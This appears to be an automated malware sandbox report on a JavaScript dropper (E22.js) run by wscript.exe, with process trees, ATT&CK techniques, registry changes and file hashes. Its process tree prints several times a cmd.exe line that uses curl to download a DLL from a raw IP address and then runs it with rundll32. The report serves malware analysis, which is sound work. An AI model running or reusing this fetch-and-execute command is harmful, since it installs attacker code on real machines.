ca551c12be470f36c5df6ab7db75c247257fb9f163f8682d5504d1f28db0a4cfbc3c5e1f78e7a5a02070b004c5b7f772a7de220dbd3325468c649226e33e2e6396da9b8c3df81809d703cc7d8682e0ca04075150d7ff92d50cefda869f99d7ebb7af68e2392694ba68b7bf83d3ea7a673d6267ae25e572e8e2e4ecae12f64b2b3c9fe9b040f33854b3fdb768c8dac68f513cb2fb91dc1ce79b9de1b70d728fe2a4c4a978f9eb14acc64305c26539281802c382b29d05be65ed965f65743cfb09352e7b9c13fd1b0f5dc76d813a560fcc3be1af022f22ac46ca463ca01c4cd644b45e2e5c156609e12629fec65261bab173ffc30c9ce56c6a943f14ca40169584f359a9ac5f4c61936dd13bcca2950c22a66767442eb9d9d28a41b3660b5afb7d23a5f21ab0ffde9b83942ed13fdf92b791af053b65c7a06cb1cd6212c3901be325ce34bc6f7776b110c3f7051ac0d6af7462481777926990611cde958074548f181cc3f303d0bfa443758653187a0a2e091c369f91fd828a224bd10e5025ddcb030c17c98300084e354d8a8bedf00294662c447fcb95279617ad0930acb671176e8b17f61c09d42d3b98a571d35413d960f3f54b664ffaf1ee20128db4ac57b14563a1ac76a9c2fb	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B7AB3308D1EA4477BA1480125A6FBDA936490CBB	wscript.exe

Runs ping.exe 1 TTPs 6 IoCs

Remote System Discovery

T1018

pid	Process
1228	PING.EXE
1344	PING.EXE
4400	PING.EXE
3236	PING.EXE
3412	PING.EXE
1344	PING.EXE

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1976	firefox.exe
Token: SeDebugPrivilege	1976	firefox.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
1976	firefox.exe
1976	firefox.exe
1976	firefox.exe
1976	firefox.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
1976	firefox.exe
1976	firefox.exe
1976	firefox.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
1976	firefox.exe
1976	firefox.exe
1976	firefox.exe
1976	firefox.exe
1976	firefox.exe
1976	firefox.exe
1976	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2184 wrote to memory of 4884	2184	wscript.exe	86
PID 2184 wrote to memory of 4884	2184	wscript.exe	86
PID 4884 wrote to memory of 1228	4884	cmd.exe	88
PID 4884 wrote to memory of 1228	4884	cmd.exe	88
PID 4884 wrote to memory of 1312	4884	cmd.exe	93
PID 4884 wrote to memory of 1312	4884	cmd.exe	93
PID 4884 wrote to memory of 1344	4884	cmd.exe	94
PID 4884 wrote to memory of 1344	4884	cmd.exe	94
PID 4884 wrote to memory of 3268	4884	cmd.exe	95
PID 4884 wrote to memory of 3268	4884	cmd.exe	95
PID 1180 wrote to memory of 3492	1180	WScript.exe	103
PID 1180 wrote to memory of 3492	1180	WScript.exe	103
PID 3492 wrote to memory of 4400	3492	cmd.exe	105
PID 3492 wrote to memory of 4400	3492	cmd.exe	105
PID 3492 wrote to memory of 3468	3492	cmd.exe	108
PID 3492 wrote to memory of 3468	3492	cmd.exe	108
PID 3492 wrote to memory of 3236	3492	cmd.exe	109
PID 3492 wrote to memory of 3236	3492	cmd.exe	109
PID 3492 wrote to memory of 4828	3492	cmd.exe	110
PID 3492 wrote to memory of 4828	3492	cmd.exe	110
PID 1228 wrote to memory of 1332	1228	WScript.exe	112
PID 1228 wrote to memory of 1332	1228	WScript.exe	112
PID 1332 wrote to memory of 3412	1332	cmd.exe	114
PID 1332 wrote to memory of 3412	1332	cmd.exe	114
PID 1332 wrote to memory of 5076	1332	cmd.exe	115
PID 1332 wrote to memory of 5076	1332	cmd.exe	115
PID 1332 wrote to memory of 1344	1332	cmd.exe	116
PID 1332 wrote to memory of 1344	1332	cmd.exe	116
PID 1332 wrote to memory of 4544	1332	cmd.exe	117
PID 1332 wrote to memory of 4544	1332	cmd.exe	117
PID 4428 wrote to memory of 1976	4428	firefox.exe	122
PID 4428 wrote to memory of 1976	4428	firefox.exe	122
PID 4428 wrote to memory of 1976	4428	firefox.exe	122
PID 4428 wrote to memory of 1976	4428	firefox.exe	122
PID 4428 wrote to memory of 1976	4428	firefox.exe	122
PID 4428 wrote to memory of 1976	4428	firefox.exe	122
PID 4428 wrote to memory of 1976	4428	firefox.exe	122
PID 4428 wrote to memory of 1976	4428	firefox.exe	122
PID 4428 wrote to memory of 1976	4428	firefox.exe	122
PID 4428 wrote to memory of 1976	4428	firefox.exe	122
PID 4428 wrote to memory of 1976	4428	firefox.exe	122
PID 1976 wrote to memory of 5000	1976	firefox.exe	123
PID 1976 wrote to memory of 5000	1976	firefox.exe	123
PID 1976 wrote to memory of 3288	1976	firefox.exe	124
PID 1976 wrote to memory of 3288	1976	firefox.exe	124
PID 1976 wrote to memory of 3288	1976	firefox.exe	124
PID 1976 wrote to memory of 3288	1976	firefox.exe	124
PID 1976 wrote to memory of 3288	1976	firefox.exe	124
PID 1976 wrote to memory of 3288	1976	firefox.exe	124
PID 1976 wrote to memory of 3288	1976	firefox.exe	124
PID 1976 wrote to memory of 3288	1976	firefox.exe	124
PID 1976 wrote to memory of 3288	1976	firefox.exe	124
PID 1976 wrote to memory of 3288	1976	firefox.exe	124
PID 1976 wrote to memory of 3288	1976	firefox.exe	124
PID 1976 wrote to memory of 3288	1976	firefox.exe	124
PID 1976 wrote to memory of 3288	1976	firefox.exe	124
PID 1976 wrote to memory of 3288	1976	firefox.exe	124
PID 1976 wrote to memory of 3288	1976	firefox.exe	124
PID 1976 wrote to memory of 3288	1976	firefox.exe	124
PID 1976 wrote to memory of 3288	1976	firefox.exe	124
PID 1976 wrote to memory of 3288	1976	firefox.exe	124
PID 1976 wrote to memory of 3288	1976	firefox.exe	124
PID 1976 wrote to memory of 3288	1976	firefox.exe	124
PID 1976 wrote to memory of 3288	1976	firefox.exe	124

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\E22.js
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2184
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c zZE || Echo zZE & ping zZE || Curl http://66.42.96.41/QIz/envir -o %TmP%\zZE.dll & ping -n 4 zZE || RUNDLl32 %tMP%\zZE.dll, Crash & eXit U=Np=GVCQH
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4884
- - C:\Windows\system32\PING.EXE
    ping zZE
    3⤵
    - Runs ping.exe
    PID:1228
- - C:\Windows\system32\curl.exe
    Curl http://66.42.96.41/QIz/envir -o C:\Users\Admin\AppData\Local\Temp\zZE.dll
    3⤵
    PID:1312
- - C:\Windows\system32\PING.EXE
    ping -n 4 zZE
    3⤵
    - Runs ping.exe
    PID:1344
- - C:\Windows\system32\rundll32.exe
    RUNDLl32 C:\Users\Admin\AppData\Local\Temp\zZE.dll, Crash
    3⤵
    PID:3268

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4572

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\E22.js"
1⤵
- Checks computer location settings
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1180
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c zZE || Echo zZE & ping zZE || Curl http://66.42.96.41/QIz/envir -o %TmP%\zZE.dll & ping -n 4 zZE || RUNDLl32 %tMP%\zZE.dll, Crash & eXit U=Np=GVCQH
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3492
- - C:\Windows\system32\PING.EXE
    ping zZE
    3⤵
    - Runs ping.exe
    PID:4400
- - C:\Windows\system32\curl.exe
    Curl http://66.42.96.41/QIz/envir -o C:\Users\Admin\AppData\Local\Temp\zZE.dll
    3⤵
    PID:3468
- - C:\Windows\system32\PING.EXE
    ping -n 4 zZE
    3⤵
    - Runs ping.exe
    PID:3236
- - C:\Windows\system32\rundll32.exe
    RUNDLl32 C:\Users\Admin\AppData\Local\Temp\zZE.dll, Crash
    3⤵
    PID:4828

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\E22.js"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1228
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c zZE || Echo zZE & ping zZE || Curl http://66.42.96.41/QIz/envir -o %TmP%\zZE.dll & ping -n 4 zZE || RUNDLl32 %tMP%\zZE.dll, Crash & eXit U=Np=GVCQH
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1332
- - C:\Windows\system32\PING.EXE
    ping zZE
    3⤵
    - Runs ping.exe
    PID:3412
- - C:\Windows\system32\curl.exe
    Curl http://66.42.96.41/QIz/envir -o C:\Users\Admin\AppData\Local\Temp\zZE.dll
    3⤵
    PID:5076
- - C:\Windows\system32\PING.EXE
    ping -n 4 zZE
    3⤵
    - Runs ping.exe
    PID:1344
- - C:\Windows\system32\rundll32.exe
    RUNDLl32 C:\Users\Admin\AppData\Local\Temp\zZE.dll, Crash
    3⤵
    PID:4544

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4428
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:1976
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1976.0.1175651132\1796674403" -parentBuildID 20221007134813 -prefsHandle 1920 -prefMapHandle 1912 -prefsLen 20938 -prefMapSize 232675 -appDir "C:\Program Files\Mozilla Firefox\browser" - {632c06ef-b627-4fbe-8240-7f24ace9f91c} 1976 "\\.\pipe\gecko-crash-server-pipe.1976" 2008 196285d8858 gpu
    3⤵
    PID:5000
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1976.1.238594389\2012512450" -parentBuildID 20221007134813 -prefsHandle 2396 -prefMapHandle 2384 -prefsLen 20974 -prefMapSize 232675 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {da097505-ec29-4982-bd4a-414c26fb6358} 1976 "\\.\pipe\gecko-crash-server-pipe.1976" 2408 196284fd258 socket
    3⤵
    - Checks processor information in registry
    PID:3288
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1976.2.568499092\1003123386" -childID 1 -isForBrowser -prefsHandle 3032 -prefMapHandle 3064 -prefsLen 21012 -prefMapSize 232675 -jsInitHandle 1228 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c6690f0b-cba1-4148-9f3e-9774eb344240} 1976 "\\.\pipe\gecko-crash-server-pipe.1976" 3236 1962c5a9b58 tab
    3⤵
    PID:4984
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1976.3.663372310\628329067" -childID 2 -isForBrowser -prefsHandle 3548 -prefMapHandle 3544 -prefsLen 26437 -prefMapSize 232675 -jsInitHandle 1228 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {66f59275-e872-4008-837c-3117dd5514eb} 1976 "\\.\pipe\gecko-crash-server-pipe.1976" 3560 1961bd62b58 tab
    3⤵
    PID:4872
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1976.4.356710623\1657853670" -childID 3 -isForBrowser -prefsHandle 4388 -prefMapHandle 4380 -prefsLen 26496 -prefMapSize 232675 -jsInitHandle 1228 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {735d714b-6345-4d8a-a6ff-215958880d17} 1976 "\\.\pipe\gecko-crash-server-pipe.1976" 4412 1962dc1f958 tab
    3⤵
    PID:3128
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1976.7.2112647706\1995912104" -childID 6 -isForBrowser -prefsHandle 5336 -prefMapHandle 5340 -prefsLen 26496 -prefMapSize 232675 -jsInitHandle 1228 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5ada6dae-43dd-4697-9d03-25037def518a} 1976 "\\.\pipe\gecko-crash-server-pipe.1976" 5328 1962e97e658 tab
    3⤵
    PID:3928
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1976.6.1128437581\1987801923" -childID 5 -isForBrowser -prefsHandle 5148 -prefMapHandle 5152 -prefsLen 26496 -prefMapSize 232675 -jsInitHandle 1228 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a027fbcf-8382-4b20-a8c4-83568845b436} 1976 "\\.\pipe\gecko-crash-server-pipe.1976" 5140 1962e97d158 tab
    3⤵
    PID:3616
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1976.5.628534519\626101156" -childID 4 -isForBrowser -prefsHandle 4992 -prefMapHandle 4988 -prefsLen 26496 -prefMapSize 232675 -jsInitHandle 1228 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {370a0a65-63f1-488f-93da-5cd09ec113ea} 1976 "\\.\pipe\gecko-crash-server-pipe.1976" 5004 19629da5c58 tab
    3⤵
    PID:2080
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1976.8.1908982746\1590523182" -childID 7 -isForBrowser -prefsHandle 4864 -prefMapHandle 6020 -prefsLen 27096 -prefMapSize 232675 -jsInitHandle 1228 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a3831b46-ff4e-4626-8f4c-08f7b8507d5a} 1976 "\\.\pipe\gecko-crash-server-pipe.1976" 4872 1962c559b58 tab
    3⤵
    PID:5764

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
1⤵
PID:2484
- C:\Windows\system32\curl.exe
  curl http://66.42.96.41/QIz/envir
  2⤵
  PID:4276
- C:\Windows\system32\curl.exe
  curl http://66.42.96.41/QIz/envir -v
  2⤵
  PID:3740
- C:\Windows\system32\curl.exe
  curl http://66.42.96.41/QIz/envir -v
  2⤵
  PID:1352
- C:\Windows\system32\curl.exe
  curl http://66.42.96.41/QIz/envir -v
  2⤵
  PID:4228
- C:\Windows\system32\curl.exe
  curl http://66.42.96.41/QIz/envir -v
  2⤵
  PID:3264

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C42BC945025A34066DAB76EF3F80A05

Filesize
41KB

MD5
a6624f60c945c19a480aaae6ccc93fc0

SHA1
ac4d8c009402bd8009e56e8e6885ad80e525e58c

SHA256
7ff7ae6ea4c73021b14102f0ae70413d1460bf6a279c63db38c9f69d7d08c656

SHA512
4f576f6dbffc6f76928e16c6993818d81d5fda243144f369a795f605ef07c773fbd56a0cd4b32a8e8101b3c125d31d125a8272457894d4273a22b87948675f34

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FE17BEC2A573BC9AE36869D0274FFA19_6DA81F04C5F9EAD2CD0268808FCE61E1

Filesize
727B

MD5
4e25d0434bd1f6cf35ee2c332255e571

SHA1
95a58811cbde3a2513d7fb8210e79545d45b8ab4

SHA256
8bc805fff18eda3d49a908d49f5659c07231e5bf0f4508019624b38a385a90f9

SHA512
09ef92c3f49ea82800bcd0b4fdcb6d7a5e559c9dad9bbdda139cbabef08907b89234026ece34f47e5626d5f56103220ac907ceda3c63b7eaab8933acbcf02e23

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C42BC945025A34066DAB76EF3F80A05

Filesize
314B

MD5
45da28f1c09f2c07c6dd0aac6a618c4e

SHA1
b3c0ab84ca78947ab940e164f6e9dc2ef145226c

SHA256
8645faea6ceadfa92af3325345aa0d752c0aa6022c9c9bf10d5679259fd49f93

SHA512
176a2973a3bb60ea941f4003152872f2b75fe9c1c900b27a62234be0de49ce3cb7d612359558b73c3b75e10bde71eefbbdacda80b1e4e5193feb3779e3433212

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FE17BEC2A573BC9AE36869D0274FFA19_6DA81F04C5F9EAD2CD0268808FCE61E1

Filesize
478B

MD5
515be242a4fd9dbd0e353e35b32f4b30

SHA1
dc40d4c8450a1bae92baba9c7e7efb9b0a88f055

SHA256
4b33ccc71e91b85e69ee1fcf245fa53d97e9fa9acfb9cd1ca639cc8b0ac8cf13

SHA512
d1252f9fd92db56fca1ddb5a59fa8b134d48fcdbf448c89d1f0df33e52c37e96b85d61098fed690ecedcc2b597754729f33d112d94db01e75ee96347faa9f101

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\u8s93mxk.default-release\activity-stream.discovery_stream.json.tmp

Filesize
23KB

MD5
b1ed7b8dcaab32a2cd0940513e7e8660

SHA1
aa0b27c57e5e6b2f036915d5417383a8413121ab

SHA256
245641c235f3429d2f53b64beb881663b8de26c9f9366a2614370ec6d818d516

SHA512
de048afe80e4e33c193b24e0241f27ae22343583b901c36225be24228c1bc11d6e0288b251c134bb0e68d059dcfd073dd6a9cab90bd65272886b143fccf86c06

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\u8s93mxk.default-release\prefs-1.js

Filesize
6KB

MD5
ab46d57d021ccb6f01fe717017cd9c08

SHA1
ffe32332117312c3fab9b9e2a3fa0aba0802bb64

SHA256
0c8108dd0153d37eb117f44c6a3d4a21e75f437bf90fa062b974f1bd18aab4f3

SHA512
b7b54ac19e0a00b1b0365743e3a5144ef3694f34856e0142e421e89abea39012aa618983ac0663ac8131ef5835da02f1735cf76a68bc1b8a39a2ddd6fb0b8798

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\u8s93mxk.default-release\prefs-1.js

Filesize
6KB

MD5
cdd1ee26e92eb7696adc7610a9faaeea

SHA1
9e800eed388ee862da7eabefce63e84f632f62bf

SHA256
bfe32cb77c9bd8be307bae2385f020ad698f353a3aeb4b92c5eb7951aac84973

SHA512
cbb50540f6a8f47661e203d6019e3c1f5d797c329f0a2687c8dce0f0327993e4f01a9542be9452cba3058bea1b82b661ae7ecb4f2b9d2127a4e033c72b041975

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\u8s93mxk.default-release\prefs.js

Filesize
6KB

MD5
f0686a8e5e42372ce1390379bad43492

SHA1
5d40654981e98f57007d42096e2d57a360e0b66c

SHA256
fc319aa41b53e1c1bd99dcd625203387cc1d6e65bdda74befd4d3a1f52ffa82d

SHA512
6cd4278a822c633f4875439c3cff70dc7af5a9800b433c28164a50c87ca0e7850e661427b447564b0984233a1b0b7fcd9be57b93fd193d51c01b211f6cd24aa8

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\u8s93mxk.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
1KB

MD5
8006b87c2b32dedf1dc09ad6b3236d99

SHA1
43006832297bdfec86be61e35a1b75baa9cfdb34

SHA256
a030429b297107e110f6cb79ae7f46cdc2fe4a1f262a32ca2321d3a97187a5a5

SHA512
1be4ae2cdded94d22f86be8257e8e72032c5dcae1632d00a1a60f2410ee3521d6745016a90a2302517a74032044df2e7f090e3b9c6a1c57453be03ecbd96113f

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\u8s93mxk.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
1KB

MD5
8cbfbd0892f7fead0a9729fb7324eb0c

SHA1
0315656fddacfbc2b35213a152c2bd84191ea0e7

SHA256
ee208b9e06a6470db0d87aea64ea80daefa2158c3ea42175289416caa6daec16

SHA512
a8a94abe0923b5bc968843ade93c7f8481926aca7b80a86a223e2c30221bcf3f9abf354c5dfa65084e42c0b34df864d4e26d8a0a4756a8da72eb393f850ee783

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\u8s93mxk.default-release\sessionstore.jsonlz4

Filesize
880B

MD5
e3939027617ed78d33aba15879fd369a

SHA1
8f0d7a36ac8651fd90bc92868f39459305cdce30

SHA256
e3879589601c784105f50332c01c73c280f85192c564400c85b30905abc8a3b3

SHA512
9cfcf36897f3f4e170417e8163714b6d4ff8a10e1f6baa6b847f549c9cdedcbc74e8c02b1e05ef29336b830415cf9048b3470a84795d3d7e95d2daee41853ec2

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads